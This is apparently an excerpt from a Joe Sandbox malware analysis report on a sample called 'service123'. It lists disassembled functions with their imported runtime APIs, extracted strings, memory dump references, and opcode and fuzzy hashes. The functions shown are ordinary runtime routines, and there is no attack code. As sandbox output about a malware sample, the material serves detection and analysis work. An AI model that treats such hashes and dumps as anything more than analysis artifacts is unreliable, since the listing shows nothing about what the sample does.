strlen.MSVCRT ref: 6C3A7662

Strings

*, xrefs: 6C3A7740
@JFl, xrefs: 6C3A7576, 6C3A7657

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *$@JFl
API String ID: 3639840916-663395308
Opcode ID: b7afdf76515e2c9e9a2c73ae2ae577f1e176082d7b9b216faa0f68a185777e0b
Instruction ID: 4751048d1589a42ce19c33919f9d5eadfa228efec83b2f1a66a5f342838508fd
Opcode Fuzzy Hash: b7afdf76515e2c9e9a2c73ae2ae577f1e176082d7b9b216faa0f68a185777e0b
Instruction Fuzzy Hash: 5F8137B5A056008FDB00EF69C488A5AFBF5FF86318F41856DD8949B724D735E81ACF82

Function 6C38E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 2656b15ac682d8ce77092cd94b2d313f6c13081b21483065ac4131a5791e6035
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 2E21D739956309CFD710DE19C48198FB7A6ABC7718B948A15D49447E18D331E88B8FE3

Function 00CB1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00CB1EAF
signal.MSVCRT ref: 00CB1EF6
signal.MSVCRT ref: 00CB1F0F
signal.MSVCRT ref: 00CB1F36
signal.MSVCRT ref: 00CB1F72
signal.MSVCRT ref: 00CB1FBF
signal.MSVCRT ref: 00CB1FD5
signal.MSVCRT ref: 00CB1FEB

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 9a48b0c7cc0a9d5f08ec37b54559009b1e666725605a887f68ec9ec23a8c91b6
Instruction ID: d052f1a41a5351e9b9595018ec5f9e2d9ae1fadffca3f651e12c43d992ae719b
Opcode Fuzzy Hash: 9a48b0c7cc0a9d5f08ec37b54559009b1e666725605a887f68ec9ec23a8c91b6
Instruction Fuzzy Hash: 2C311A705182408AE7207FA499643BE77E4AB45359F9D4909ECD486281CB7DC988EB53

Function 00CB4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00CB4378

Strings

Inf, xrefs: 00CB4E35, 00CB4E4D
NaN, xrefs: 00CB4D3B
@, xrefs: 00CB4647

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: ea8584830dd7a877183d2696d25f51e97a60c12b9ea8ac58a5206cff2d484468
Instruction ID: 9b79e1824a25d54ad5397057de9af817b100c99292a71df70ed26c03183e0166
Opcode Fuzzy Hash: ea8584830dd7a877183d2696d25f51e97a60c12b9ea8ac58a5206cff2d484468
Instruction Fuzzy Hash: 42F1BF7160C3958BD7358F24C0907EBBBE2BB85314F148A1DE9E987282D735DA0ADB42

Function 6C394A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C394A48

Strings

NaN, xrefs: 6C39540B
Inf, xrefs: 6C395505, 6C39551D
@, xrefs: 6C394D17

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: ee2533b05e949acb068c4f94eb2b5d754d8e89b97a4af935adc858a135a5e56c
Instruction ID: 5cf046deb815fb0e2c6d87607030a812de8aaddd3fd3a7132390f0ee35e7bd65
Opcode Fuzzy Hash: ee2533b05e949acb068c4f94eb2b5d754d8e89b97a4af935adc858a135a5e56c
Instruction Fuzzy Hash: 5DF1D27160C3858BD7208F24C49079BBBE5BF86319F148A1DE9EC87781E735994ACF82

Function 00CB3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 00CB34C6
@, xrefs: 00CB342A

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 1eb20b9862deb190db46b8a54ed600b3dab4d342d0e8e392372d8c2a9666036a
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 73C16D71E002558BCB15CF6DC4847DEBBF1AF88314F198259E864AB395D734EE46CB90

Function 6C393830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6C393B96
@, xrefs: 6C393AFA

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: adf06b26dd540f4f10fecdf75457223a52c7e2f8acc120714797358f2e978974
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 32C17CB1E052158BDB44CF6CC48478DFBF5AF89318F298259E898AB785E335E845CF90

Function 6C3AB5C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3AB5E6
memcmp.MSVCRT ref: 6C3AB60A
memcmp.MSVCRT ref: 6C3AB67D
memcmp.MSVCRT ref: 6C3AB6EF

Part of subcall function 6C44AB60: strlen.MSVCRT ref: 6C44AB6E

memcmp.MSVCRT ref: 6C3AB787

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3AB631, 6C3AB6A2, 6C3AB715, 6C3AB7AE, 6C3AB7CA
basic_string::compare, xrefs: 6C3AB629, 6C3AB69A, 6C3AB70D, 6C3AB7A6, 6C3AB7C2

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 1abcdb79bbc13145f5a582167cec76a192d403bfc5d49a08337380e590c7d394
Instruction ID: 33e68f7a0659594f2fbbbe7a07c4c7a1a6d3ecea1f98de48bd581a248e2a51a3
Opcode Fuzzy Hash: 1abcdb79bbc13145f5a582167cec76a192d403bfc5d49a08337380e590c7d394
Instruction Fuzzy Hash: 4F61577160A3159FD300EF6AC98185AFBE5FF88658F15892DE4C887B24E372D841CB93

Function 6C38E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 27c31b3c78488c632a95859f69bf3b84d02a6c53bd62b7f6a2045c59606b1d78
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 40519C7950A7058FC710CF19C080A5AB7E4BF8A708F444E9EE8E89B750D379D90ACF96

Function 6C38E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C38E487
WaitForSingleObject.KERNEL32 ref: 6C38E4C8

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: d3be0100bd7cf198da132ea8d028ea72de45351e357eda7d2a228478cea3726d
Instruction ID: cae50ec96b98fc1e56160b9711c5d99fbd51d8b9b6c64c768ca6ce143725b081
Opcode Fuzzy Hash: d3be0100bd7cf198da132ea8d028ea72de45351e357eda7d2a228478cea3726d
Instruction Fuzzy Hash: 49515A7470A3018FEB20EF6AD68471B7BF4AB4670CF508928D95887789D772D8458FA2

Function 6C3901F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C390209
memcpy.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C39022D
malloc.MSVCRT ref: 6C390247
memset.MSVCRT ref: 6C390275
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 8eec66c21d4c403dde7bd11bef72ba4a4b885fb6b0addb6a35ad9d5b68617538
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: FB114FB16093459ED700AF69D4809AAF7E8EB44258F45897ED88C87B00F731D5088A66

Function 00CB8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00CB812C
GetProcAddress.KERNEL32 ref: 00CB814C
GetProcAddress.KERNEL32 ref: 00CB818B

Strings

___lc_codepage_func, xrefs: 00CB8144
msvcrt.dll, xrefs: 00CB8125
__lc_codepage, xrefs: 00CB8180

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: ea7e4d63ab50928fba0dc47eeaa70086703cd0c62a1e98f178613cca91ebbd98
Instruction ID: ebde28dbb3860cc383dfd9acb7f0a3f2f8297e1a2d67e2a4af5a63d4f898f339
Opcode Fuzzy Hash: ea7e4d63ab50928fba0dc47eeaa70086703cd0c62a1e98f178613cca91ebbd98
Instruction Fuzzy Hash: 97F0F9F09092118F9B10BF3D6D453DF7AF8AA08751F55463AD885D7241EA748849CBA3

Function 6C399171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C39917C
GetProcAddress.KERNEL32 ref: 6C39919C
GetProcAddress.KERNEL32 ref: 6C3991DB

Strings

__lc_codepage, xrefs: 6C3991D0
msvcrt.dll, xrefs: 6C399175
___lc_codepage_func, xrefs: 6C399194

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: ecd65a8faf5359a52081ba04b14c9f422427361c92724d86c6388cfcdb7b326a
Instruction ID: c65ac07e840eac4194cf87ce6e64d4d764928bc2d500760340b5099f9f1ea108
Opcode Fuzzy Hash: ecd65a8faf5359a52081ba04b14c9f422427361c92724d86c6388cfcdb7b326a
Instruction Fuzzy Hash: 34F04FB2A853018FAB00FF7C5A4A24ABBF4BA05264F50053AC88DC7608F232C414CFE2

Function 6C38EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: b855f9a8c7be6ea63289f2176a308630e260898fbdeac9a64492333e39ca0bfe
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: DDB01231CCF3288E4830997C05108C2B20DE6573483445C43C99E63E049316E00B8C67

Function 6C424890 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C42B65E), ref: 6C424913
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C42B65E), ref: 6C424955

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 5cd85badde397fe1ba199ab82fe1b76ff4aeba0f56f35e73d6f6a0596e04f516
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 5A6115B4A09701CFC714DF29C58191AFBE0EF88794F20892DE89A8B761E730E845CB56

Function 6C420720 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C3B9053,00000003), ref: 6C42079D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C3B9053,00000003), ref: 6C4207DC

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: a5cf10d8cfdaed26a4301ecb28edda6a4a11b2556211ae6fff89ca32eee4560b
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 0F61CFB49097428FC704DF19C19191AFBE1EF98754F20891DE8EA8B761E734E845CF82

Function 6C422940 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C41711E), ref: 6C4229B3

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C422AC4, 6C422B21, 6C422B86
basic_string::basic_string, xrefs: 6C422ABC, 6C422B19
string::string, xrefs: 6C422B7E
basic_string::_M_create, xrefs: 6C4229CA, 6C422A6A

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 024a98003af7434083a24a5947585dfba8af9946b95f38cdb5d9517ffc846ac9
Instruction ID: b50a7d583ffabf41d1655ab559de31872c76c91930eb0e0a10fc6720c598ce5e
Opcode Fuzzy Hash: 024a98003af7434083a24a5947585dfba8af9946b95f38cdb5d9517ffc846ac9
Instruction Fuzzy Hash: 4E714DB29093508FD310DF2DD481A4AFBE0FF89228F55C9AED8889B716D335D945CB92

Function 6C38EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: f2fcdb10f4daab22273d814c0c93d08b1b23ea518df1dcc66c05665f5bbff52d
